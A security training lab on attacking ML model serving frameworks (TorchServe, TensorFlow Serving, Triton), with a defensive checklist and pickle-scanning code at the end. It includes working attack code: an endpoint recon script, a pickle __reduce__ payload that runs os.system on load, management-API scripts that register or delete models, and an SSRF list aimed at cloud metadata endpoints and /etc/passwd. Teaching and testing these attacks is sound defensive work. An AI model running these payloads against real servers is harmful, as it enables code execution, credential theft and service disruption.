Lab: Model Serving Framework Attacks
Exploit vulnerabilities in TensorFlow Serving, TorchServe, and Triton Inference Server, targeting model loading, API endpoints, and management interfaces.
Prerequisites
- Docker installed for running serving frameworks
- Understanding of model serialization formats (SavedModel, TorchScript, ONNX)
- Python with `httpx`, `grpcio`, and `torch`
- Familiarity with REST and gRPC API patterns

```bash
pip install httpx grpcio torch torchvision requests python-dotenv
```

Background
Model serving frameworks are the gateway between trained models and production traffic. Their attack surface includes model loading (deserialization of potentially malicious model files), management APIs (deploying, updating, or deleting models), and inference endpoints (input validation and output handling).
Lab Exercises
Map Serving Framework Attack Surfaces
Deploy multiple serving frameworks and enumerate their exposed interfaces.
```python
#!/usr/bin/env python3
"""Reconnaissance against model serving frameworks."""

import httpx

FRAMEWORKS = {
    "torchserve": {
        "base_url": "http://localhost:8080",
        "management_url": "http://localhost:8081",
        "endpoints": [
            "/ping",
            "/models",
            "/api-description",
            "/predictions/model_name",
            "/explanations/model_name",
        ],
        "management_endpoints": [
            "/models",
            "/models/model_name",
            "/models/model_name/1.0/set-default",
        ],
    },
    "tensorflow_serving": {
        "base_url": "http://localhost:8501",
        "endpoints": [
            "/v1/models",
            "/v1/models/model_name",
            "/v1/models/model_name/metadata",
            "/v1/models/model_name/versions",
        ],
    },
    "triton": {
        "base_url": "http://localhost:8000",
        "endpoints": [
            "/v2/health/ready",
            "/v2/health/live",
            "/v2/models",
            "/v2/models/model_name",
            "/v2/models/model_name/config",
            "/v2/models/stats",
            "/v2/repository/index",
        ],
    },
}


def recon_framework(name: str, config: dict):
    """Enumerate endpoints of a serving framework."""
    print(f"\n=== {name.upper()} ===")
    base = config["base_url"]
    for endpoint in config["endpoints"]:
        try:
            resp = httpx.get(f"{base}{endpoint}", timeout=3)
            status = resp.status_code
            body = resp.text[:150]
            print(f"  [{status}] {endpoint}")
            if status == 200:
                print(f"    {body}")
        except httpx.RequestError:
            print(f"  [---] {endpoint} (unreachable)")

    # Check management endpoints separately
    if "management_url" in config:
        mgmt = config["management_url"]
        print(f"\n  Management API ({mgmt}):")
        for ep in config.get("management_endpoints", []):
            try:
                resp = httpx.get(f"{mgmt}{ep}", timeout=3)
                print(f"  [{resp.status_code}] {ep}")
            except httpx.RequestError:
                print(f"  [---] {ep}")


if __name__ == "__main__":
    for name, config in FRAMEWORKS.items():
        recon_framework(name, config)
```

```bash
python serving_recon.py
```

Craft a Malicious Model File
Demonstrate how serialized model files can contain executable payloads.
```python
#!/usr/bin/env python3
"""Demonstrate malicious model file creation.

WARNING: This creates a DEMONSTRATION payload that only writes a
marker file. Real malicious models could execute arbitrary code.
"""

import os
import pickle

import torch


class MaliciousModule(torch.nn.Module):
    """A model that executes code when loaded via pickle."""

    def __init__(self):
        super().__init__()
        self.linear = torch.nn.Linear(10, 2)

    def forward(self, x):
        return self.linear(x)

    def __reduce__(self):
        """Override pickle deserialization to execute code."""
        # DEMONSTRATION ONLY: creates a harmless marker file
        cmd = "touch /tmp/model_rce_proof && echo 'RCE demonstrated'"
        return (os.system, (cmd,))


def create_malicious_pickle():
    """Create a pickle file with embedded code execution."""
    print("=== Malicious Pickle Model ===")
    model = MaliciousModule()

    # Save as pickle (used by many serving frameworks)
    with open("/tmp/malicious_model.pkl", "wb") as f:
        pickle.dump(model, f)
    print("  Created /tmp/malicious_model.pkl")
    print("  Loading this file will execute: touch /tmp/model_rce_proof")

    # Verify the attack works
    print("\n  Loading malicious pickle...")
    with open("/tmp/malicious_model.pkl", "rb") as f:
        pickle.load(f)

    if os.path.exists("/tmp/model_rce_proof"):
        print("  ** RCE CONFIRMED: marker file created **")
        os.remove("/tmp/model_rce_proof")
    else:
        print("  Execution was blocked (safe pickle mode)")


def create_safe_model():
    """Show how to create a model using safe serialization."""
    print("\n=== Safe Model Serialization ===")
    model = torch.nn.Linear(10, 2)

    # SafeTensors format: cannot contain executable code
    try:
        from safetensors.torch import save_file

        save_file(model.state_dict(), "/tmp/safe_model.safetensors")
        print("  Created /tmp/safe_model.safetensors (SafeTensors format)")
        print("  SafeTensors only stores tensor data, no executable code")
    except ImportError:
        print("  Install safetensors: pip install safetensors")

    # State dict only: also safe
    torch.save(model.state_dict(), "/tmp/model_state_dict.pt")
    print("  Created /tmp/model_state_dict.pt (state_dict only)")
    print("  State dicts require a matching architecture to load, limiting attack surface")


if __name__ == "__main__":
    create_malicious_pickle()
    create_safe_model()
```

```bash
python malicious_model.py
```

Attack Management APIs
Exploit management API endpoints to deploy malicious models or modify configurations.
```python
#!/usr/bin/env python3
"""Attack model serving management APIs."""

import json

import httpx

# TorchServe management API (default: port 8081, often unprotected)
TORCHSERVE_MGMT = "http://localhost:8081"


def torchserve_list_models():
    """List all deployed models via management API."""
    try:
        resp = httpx.get(f"{TORCHSERVE_MGMT}/models", timeout=5)
        if resp.status_code == 200:
            models = resp.json()
            print(f"Deployed models: {json.dumps(models, indent=2)}")
            return models
    except httpx.RequestError as e:
        print(f"Management API unreachable: {e}")
    return None


def torchserve_register_model(url: str, model_name: str):
    """Register a model from a URL -- potential for SSRF or malicious model loading."""
    try:
        resp = httpx.post(
            f"{TORCHSERVE_MGMT}/models",
            params={
                "url": url,
                "model_name": model_name,
                "initial_workers": 1,
            },
            timeout=30,
        )
        print(f"Register response [{resp.status_code}]: {resp.text[:200]}")
        return resp.status_code == 200
    except httpx.RequestError as e:
        print(f"Registration failed: {e}")
        return False


def torchserve_delete_model(model_name: str):
    """Delete a deployed model -- availability attack."""
    try:
        resp = httpx.delete(
            f"{TORCHSERVE_MGMT}/models/{model_name}",
            timeout=10,
        )
        print(f"Delete response [{resp.status_code}]: {resp.text}")
    except httpx.RequestError as e:
        print(f"Deletion failed: {e}")


def test_ssrf_via_model_url():
    """Test SSRF through model URL parameter."""
    print("\n=== SSRF via Model Registration ===")
    ssrf_urls = [
        "http://169.254.169.254/latest/meta-data/",  # AWS metadata
        "http://metadata.google.internal/",          # GCP metadata
        "http://localhost:8081/models",              # Self-referential
        "file:///etc/passwd",                        # Local file read
    ]
    for url in ssrf_urls:
        print(f"\n  Testing SSRF: {url}")
        torchserve_register_model(url, "ssrf_test")


if __name__ == "__main__":
    print("=== Model Serving Management API Attack ===\n")
    torchserve_list_models()
    test_ssrf_via_model_url()
```

```bash
python management_attack.py
```

Implement Serving Security Controls
Design and verify security controls for model serving deployments.
```python
# Model Serving Security Checklist:
#
# 1. Model Loading Safety
#    - Use SafeTensors format instead of pickle/joblib
#    - Validate model checksums before loading
#    - Run model loading in sandboxed environments
#    - Scan model files for embedded code (pickle opcode analysis)
#
# 2. Management API Protection
#    - Bind management APIs to localhost or internal networks only
#    - Require authentication for all management operations
#    - Implement rate limiting on model registration
#    - Validate model source URLs against an allowlist
#
# 3. Inference API Hardening
#    - Validate input shapes and types before inference
#    - Set maximum input sizes and batch sizes
#    - Implement request timeout and cancellation
#    - Filter error messages to prevent information disclosure
#
# 4. Network Isolation
#    - Separate management and inference on different network segments
#    - Block outbound network from inference containers
#    - Use TLS for all API communications
#    - Implement network policies in Kubernetes
```
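The checklist item "scan model files for embedded code (pickle opcode analysis)" can be sketched with the standard library's `pickletools`. This is an illustration, not a production scanner: the opcode set below is an assumed heuristic, and real tools such as Fickling instead use import allowlists, since legitimate PyTorch checkpoints also emit `GLOBAL` opcodes for tensor storage classes.

```python
"""Sketch of pickle opcode scanning for the checklist above."""
import pickletools

# Assumed heuristic: opcodes that import names or invoke callables
# during unpickling, which is how pickle payloads execute code.
SUSPICIOUS_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX",
}


def scan_pickle_bytes(data: bytes) -> list:
    """Return a finding for each opcode that can trigger code execution."""
    findings = []
    for opcode, arg, pos in pickletools.genops(data):
        if opcode.name in SUSPICIOUS_OPCODES:
            findings.append(f"{opcode.name} at byte offset {pos} (arg={arg!r})")
    return findings
```

A pure-data pickle such as `pickle.dumps({"weights": [1, 2, 3]})` produces no findings, while any `__reduce__`-based payload is flagged through its `GLOBAL`/`STACK_GLOBAL` and `REDUCE` opcodes.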
Troubleshooting
| Issue | Solution |
|---|---|
| Serving framework fails to start | Check Docker logs: `docker logs <container_name>` |
| Management API returns 403 | API may be configured for localhost only; test from within the container |
| Malicious model blocked | Some frameworks now include pickle scanning; this is the expected defense |
| SSRF test does not connect | The framework may not follow redirects or may have URL validation |
Related Topics
- Inference Server Exploitation - Complementary infrastructure attacks
- Container Breakout - Escaping the serving container
- ML Pipeline Poisoning - Attacking the pipeline that feeds serving frameworks
- Model Registry Compromise - Substituting models before they reach serving
References
- "Unsafe at any Speed: Exploiting ML Model Serialization" - Hugging Face Security Team (2024) - Analysis of pickle-based model deserialization attacks
- "TorchServe Security Advisory CVE-2023-43654" - PyTorch (2023) - Critical SSRF vulnerability in TorchServe management API
- "Securing ML Model Serving Infrastructure" - Google (2024) - Best practices for serving framework security
- "SafeTensors: A Safer Serialization Format for ML" - Hugging Face (2023) - Safe alternative to pickle-based model storage
Why is pickle-based model serialization particularly dangerous in model serving environments?
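As a starting point for the question above: a pickle stream is effectively a program, and `pickle.load` will import and call whatever names the stream references. A minimal defensive sketch, adapted from the "Restricting Globals" pattern in the Python `pickle` documentation (the allowlist contents here are an assumption for illustration):

```python
"""Allowlist-based unpickling, illustrating why raw pickle.load is unsafe."""
import io
import pickle

# Assumed allowlist for illustration; a real deployment would enumerate
# exactly the classes a given model checkpoint legitimately needs.
ALLOWED_GLOBALS = {("builtins", "dict"), ("builtins", "list")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every GLOBAL/STACK_GLOBAL opcode in the stream,
        # i.e. every name the pickle tries to import.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked import: {module}.{name}")


def restricted_loads(data: bytes):
    """Unpickle data, refusing any import outside the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Against the `__reduce__` payload from the lab, `restricted_loads` raises `UnpicklingError` instead of calling `os.system`, while pure-data pickles (dicts, lists, numbers, strings) load unchanged because they never trigger `find_class` at all.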